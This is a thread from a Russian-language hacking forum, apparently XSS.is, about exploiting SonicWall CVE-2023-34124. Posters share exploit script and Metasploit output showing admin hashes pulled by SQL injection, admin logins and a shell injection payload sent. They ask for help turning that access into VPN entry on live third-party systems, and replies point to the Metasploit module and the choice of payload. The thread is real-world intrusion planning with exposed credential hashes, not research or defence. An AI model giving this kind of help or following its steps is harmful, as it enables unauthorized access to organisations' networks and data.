• XSS.stack #1 – первый литературный журнал от юзеров форума

VPN Уязвимость SonicWall CVE-2023-34124

Potato07

HDD-drive
Пользователь
Регистрация
19.07.2023
Сообщения
33
Реакции
5
Гарант сделки
11
Приветствую всех! 🎄
У меня есть небольшая проблема по поводу CVE-2023-34124 под SonicWall
Использую python-скрипт, который при пробитии дает ответ такого типа:
Код:
[+] Admin creds: admin:94365e2e2dahgfe41gh27fa771e864f8
[+] Generated client token: e2d06856592d9e1906c270976440d2f4
[+] Successfully logged in as admin, OS: Linux
[~] Open in browser? (y\n)
[>]
После этого открывается браузер с интерфейсом SonicWall, здесь уже возникают трудности: создаю юзера, добавляю в необходимые группы, но это не работает.
Может, кто-то знает, какие действия нужно сделать для того, чтобы в итоге подключиться к VPN?
Или, может, я смогу где-то дернуть уже существующие креды или как-то применить строку "Admin creds" из выданного скриптом?

Буду очень признателен, если кто-то поможет
 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Running: SonicWall Universal Management Suite v9.3
[*] Sending SQL injection request to get the username/hash...
[+] Found an account: admin:125144c9cc3b1a5b996e6c6a50e1a751
[*] Attempting to authenticate with the client token + password hash...
[+] Successfully logged in as admin (Linux detected!)
[*] Attempting to execute the shell injection payload
[+] Payload sent!
[*] Exploit completed, but no session was created.
тут ничего не выйдет?
 
Приветствую всех! 🎄
У меня есть небольшая проблема по поводу CVE-2023-34124 под SonicWall
Использую python-скрипт, который при пробитии дает ответ такого типа:
Код:
[+] Admin creds: admin:94365e2e2dahgfe41gh27fa771e864f8
[+] Generated client token: e2d06856592d9e1906c270976440d2f4
[+] Successfully logged in as admin, OS: Linux
[~] Open in browser? (y\n)
[>]
После этого открывается браузер с интерфейсом SonicWall, здесь уже возникают трудности: создаю юзера, добавляю в необходимые группы, но это не работает.
Может, кто-то знает, какие действия нужно сделать для того, чтобы в итоге подключиться к VPN?
Или, может, я смогу где-то дернуть уже существующие креды или как-то применить строку "Admin creds" из выданного скриптом?

Буду очень признателен, если кто-то поможет
1703091524939.png

1703091617047.png



Этот модуль есть в метасплоите, не прововали оттуда запускать?
 
Последнее редактирование:
Приветствую всех! 🎄
У меня есть небольшая проблема по поводу CVE-2023-34124 под SonicWall
Использую python-скрипт, который при пробитии дает ответ такого типа:
Код:
[+] Admin creds: admin:94365e2e2dahgfe41gh27fa771e864f8
[+] Generated client token: e2d06856592d9e1906c270976440d2f4
[+] Successfully logged in as admin, OS: Linux
[~] Open in browser? (y\n)
[>]
После этого открывается браузер с интерфейсом SonicWall, здесь уже возникают трудности: создаю юзера, добавляю в необходимые группы, но это не работает.
Может, кто-то знает, какие действия нужно сделать для того, чтобы в итоге подключиться к VPN?
Или, может, я смогу где-то дернуть уже существующие креды или как-то применить строку "Admin creds" из выданного скриптом?

Буду очень признателен, если кто-то поможет
Я не хочу чтобы ты там своих юзеров создавал и прекрати уже светить там своим столичным ипом)))))

Screenshot_1.jpg
 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Running: SonicWall Universal Management Suite v9.3
[*] Sending SQL injection request to get the username/hash...
[+] Found an account: admin:125144c9cc3b1a5b996e6c6a50e1a751
[*] Attempting to authenticate with the client token + password hash...
[+] Successfully logged in as admin (Linux detected!)
[*] Attempting to execute the shell injection payload
[+] Payload sent!
[*] Exploit completed, but no session was created.
тут ничего не выйдет?
вам нужно установить правильную полезную нагрузку
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх